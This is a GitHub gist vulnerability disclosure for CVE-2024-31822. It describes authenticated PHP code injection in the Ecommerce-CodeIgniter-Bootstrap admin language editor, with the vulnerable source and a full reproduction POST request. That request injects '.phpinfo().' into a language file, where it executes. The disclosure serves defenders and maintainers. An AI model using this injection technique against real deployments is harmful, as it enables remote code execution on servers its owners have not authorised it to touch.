Skip to content

Instantly share code, notes, and snippets.

@LioTree
Last active April 28, 2024 12:45
Show Gist options
  • Save LioTree/f83e25b2c5e144c0b3ad8919e6483c7a to your computer and use it in GitHub Desktop.
Save LioTree/f83e25b2c5e144c0b3ad8919e6483c7a to your computer and use it in GitHub Desktop.
CVE-2024-31822

vendor: kirilkirkov/Ecommerce-CodeIgniter-Bootstrap (github.com)

version: before Vulnerability fixes from Lion Tree · kirilkirkov/Ecommerce-CodeIgniter-Bootstrap@d22b54e (github.com)

A code injection(CWE-94) vulnerability is in application/modules/admin/controllers/advanced_settings/Languages.php. In the saveLanguageFiles method, the element of $_POST['php_keys'] is escaped by htmlentities and enclosed in two single quotes as the key of $lang. However, htmlentities doesn't escape ' , which allows the attacker to escape from single quotes and inject malicious PHP code, leading to authenticated remote code execution.

private function saveLanguageFiles()
    {
        $i = 0;
        $prevFile = 'none';
        $phpFileInclude = "<?php \n";
        foreach ($_POST['php_files'] as $phpFile) {
            if ($phpFile != $prevFile && $i > 0) {
                savefile($prevFile, $phpFileInclude);
                $phpFileInclude = "<?php \n";
            }
            $php_value = str_replace("'", '&#39;', $_POST['php_values'][$i]);
			$php_value = str_replace('"', '&#34;', $php_value);
            $phpFileInclude .= '$lang[\'' . htmlentities($_POST['php_keys'][$i]) . '\'] = \'' . $php_value . '\';' . "\n";
            $prevFile = $phpFile;
            $i++;
        }
        savefile($phpFile, $phpFileInclude);
        ......
function savefile($file, $info)
{
    $file = fopen($file, "w");
    fwrite($file, $info);
    fclose($file);
}

The steps to reproduce are as follows:

POST /Ecommerce-CodeIgniter-Bootstrap/admin/languages/?editLang=english HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 39539
Origin: http://localhost
Connection: close
Referer: http://localhost/Ecommerce-CodeIgniter-Bootstrap/admin/languages/?editLang=english
Cookie: ci_session=s42mnne1b8qtto2hfi675l8ej6a34me2
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

goDaddyGo=&php_files%5B%5D=application%5Clanguage%5Cenglish%5Cadmin_lang.php&php_keys%5B%5D='.phpinfo().'&php_values%5B%5D=Home&php_files%5B%5D=application%5Clanguage%5Cenglish%5Cadmin_lang.php&php_keys%5B%5D=production&php_values%5B%5D=Production&php_files%5B%5D=application%5Clanguage%5Cenglish%5Cadmin_lang.php&php_keys%5B%5D=pass_change&php_values%5B%5D=Pass+Change&php_files%5B%5D=application%5Clanguage%5Cenglish%5Cadmin_lang.php&php_keys%5B%5D=security&php_values%5B%5D=Security&php_files%5B%5D=application%5Clanguage%5Cenglish%5Cadmin_lang.php&php_keys%5B%5D=changed&php_values%5B%5D=Changed&php_files%5B%5D=application%5Clanguage%5Cenglish%5Cadmin_lang.php&php_keys%5B%5D=change_my_password
......

The application/language/english/admin_lang.php will be:

<?php 
$lang[''.phpinfo().''] = 'Home';
$lang['production'] = 'Production';
......

visit http://localhost/Ecommerce-CodeIgniter-Bootstrap/index.php/admin/languages again and phpinfo() will be executed.

Pasted image 20240103001148

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment